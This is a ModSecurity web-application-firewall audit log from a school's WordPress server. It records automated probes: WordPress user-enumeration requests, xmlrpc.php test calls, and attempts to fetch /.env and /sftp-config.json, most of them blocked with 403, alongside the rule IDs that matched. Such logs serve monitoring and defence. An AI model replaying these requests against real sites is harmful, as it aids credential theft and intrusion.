Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6055a52a-Z-- --d1bd5969-A-- [08/May/2025:23:46:29 +0700] aBzf5Y4K347NtBcwXKxvZwAAAJI 103.236.140.4 54188 103.236.140.4 8181 --d1bd5969-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d1bd5969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1bd5969-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746722789956492 2692 (- - -) Stopwatch2: 1746722789956492 2692; combined=1297, p1=394, p2=866, p3=0, p4=0, p5=37, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1bd5969-Z-- --9a466655-A-- [08/May/2025:23:46:33 +0700] aBzf6cP9GxxPAbCroFY7rgAAAFU 103.236.140.4 54236 103.236.140.4 8181 --9a466655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a466655-C-- demo.sayHello --9a466655-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a466655-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746722793561047 5950 (- - -) Stopwatch2: 1746722793561047 5950; combined=4394, p1=551, p2=3605, p3=38, p4=38, p5=96, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a466655-Z-- --5bb0554a-A-- [08/May/2025:23:53:08 +0700] aBzhdKcs1DvJ_HgMHE9zSgAAABM 103.236.140.4 59182 103.236.140.4 8181 --5bb0554a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5bb0554a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bb0554a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723188294567 3141 (- - -) Stopwatch2: 1746723188294567 3141; combined=1334, p1=458, p2=846, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bb0554a-Z-- --c4001260-A-- [08/May/2025:23:53:16 +0700] aBzhfMP9GxxPAbCroFY9MQAAAEQ 103.236.140.4 59286 103.236.140.4 8181 --c4001260-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c4001260-C-- demo.sayHello --c4001260-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4001260-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723196927904 6295 (- - -) Stopwatch2: 1746723196927904 6295; combined=4754, p1=660, p2=3844, p3=41, p4=41, p5=99, sr=153, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4001260-Z-- --77f00433-A-- [08/May/2025:23:55:51 +0700] aBziF44K347NtBcwXKxwxQAAAJQ 103.236.140.4 32788 103.236.140.4 8181 --77f00433-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --77f00433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77f00433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723351567174 2872 (- - -) Stopwatch2: 1746723351567174 2872; combined=1374, p1=450, p2=890, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77f00433-Z-- --6a95ea50-A-- [08/May/2025:23:55:57 +0700] aBziHY4K347NtBcwXKxw0wAAAJI 103.236.140.4 32856 103.236.140.4 8181 --6a95ea50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a95ea50-C-- demo.sayHello --6a95ea50-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a95ea50-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723357719312 6339 (- - -) Stopwatch2: 1746723357719312 6339; combined=4682, p1=556, p2=3884, p3=42, p4=37, p5=97, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a95ea50-Z-- --ca122d3e-A-- [08/May/2025:23:56:02 +0700] aBziIo4K347NtBcwXKxw2wAAAIg 103.236.140.4 32908 103.236.140.4 8181 --ca122d3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca122d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca122d3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723362704727 2946 (- - -) Stopwatch2: 1746723362704727 2946; combined=1392, p1=486, p2=874, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca122d3e-Z-- --2f999c49-A-- [08/May/2025:23:56:51 +0700] aBziUys5rYyn3jlLjjIlcQAAAMg 103.236.140.4 33458 103.236.140.4 8181 --2f999c49-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2f999c49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f999c49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723411925326 3127 (- - -) Stopwatch2: 1746723411925326 3127; combined=1399, p1=460, p2=901, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f999c49-Z-- --39ab9321-A-- [08/May/2025:23:56:57 +0700] aBziWacs1DvJ_HgMHE90CwAAAA0 103.236.140.4 33518 103.236.140.4 8181 --39ab9321-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.57 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39ab9321-C-- demo.sayHello --39ab9321-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39ab9321-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723417424481 5927 (- - -) Stopwatch2: 1746723417424481 5927; combined=4540, p1=557, p2=3751, p3=32, p4=37, p5=96, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39ab9321-Z-- --45d0da0e-A-- [08/May/2025:23:57:19 +0700] aBzib6cs1DvJ_HgMHE90KAAAABY 103.236.140.4 33778 103.236.140.4 8181 --45d0da0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --45d0da0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45d0da0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723439104578 2929 (- - -) Stopwatch2: 1746723439104578 2929; combined=1396, p1=438, p2=923, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45d0da0e-Z-- --5515b724-A-- [08/May/2025:23:57:25 +0700] aBzidcP9GxxPAbCroFY95QAAAEI 103.236.140.4 33856 103.236.140.4 8181 --5515b724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5515b724-C-- demo.sayHello --5515b724-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5515b724-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723445888147 6498 (- - -) Stopwatch2: 1746723445888147 6498; combined=4714, p1=623, p2=3849, p3=38, p4=42, p5=97, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5515b724-Z-- --e0ec0b0c-A-- [08/May/2025:23:57:49 +0700] aBzijcP9GxxPAbCroFY98QAAAE0 103.236.140.4 34120 103.236.140.4 8181 --e0ec0b0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0ec0b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0ec0b0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723469769887 3309 (- - -) Stopwatch2: 1746723469769887 3309; combined=1327, p1=489, p2=808, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0ec0b0c-Z-- --85bff50e-A-- [08/May/2025:23:57:55 +0700] aBzik8P9GxxPAbCroFY99wAAAEA 103.236.140.4 34192 103.236.140.4 8181 --85bff50e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85bff50e-C-- demo.sayHello --85bff50e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85bff50e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723475096515 5675 (- - -) Stopwatch2: 1746723475096515 5675; combined=4361, p1=557, p2=3576, p3=33, p4=37, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85bff50e-Z-- --c92f7375-A-- [09/May/2025:00:02:14 +0700] aBzjlis5rYyn3jlLjjImBgAAANQ 103.236.140.4 37402 103.236.140.4 8181 --c92f7375-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus Build/OPPS27.91-122-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36 Accept-Charset: utf-8 --c92f7375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c92f7375-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746723734655946 840 (- - -) Stopwatch2: 1746723734655946 840; combined=409, p1=370, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c92f7375-Z-- --42cef15d-A-- [09/May/2025:00:18:29 +0700] aBznZacs1DvJ_HgMHE94NgAAABg 103.236.140.4 48186 103.236.140.4 8181 --42cef15d-B-- GET /sftp-config.json HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 156.146.38.152 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 156.146.38.152 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --42cef15d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42cef15d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746724709940478 1253 (- - -) Stopwatch2: 1746724709940478 1253; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42cef15d-Z-- --de8fa147-A-- [09/May/2025:00:27:42 +0700] aBzpjis5rYyn3jlLjjIrBAAAANE 103.236.140.4 52650 103.236.140.4 8181 --de8fa147-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 79.139.57.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 79.139.57.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de8fa147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8fa147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746725262314481 2847 (- - -) Stopwatch2: 1746725262314481 2847; combined=1361, p1=395, p2=937, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8fa147-Z-- --d55ec074-A-- [09/May/2025:00:52:59 +0700] aBzve6cs1DvJ_HgMHE95YAAAAAk 103.236.140.4 52810 103.236.140.4 8181 --d55ec074-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d55ec074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d55ec074-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726779368280 3307 (- - -) Stopwatch2: 1746726779368280 3307; combined=1447, p1=461, p2=887, p3=0, p4=0, p5=99, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
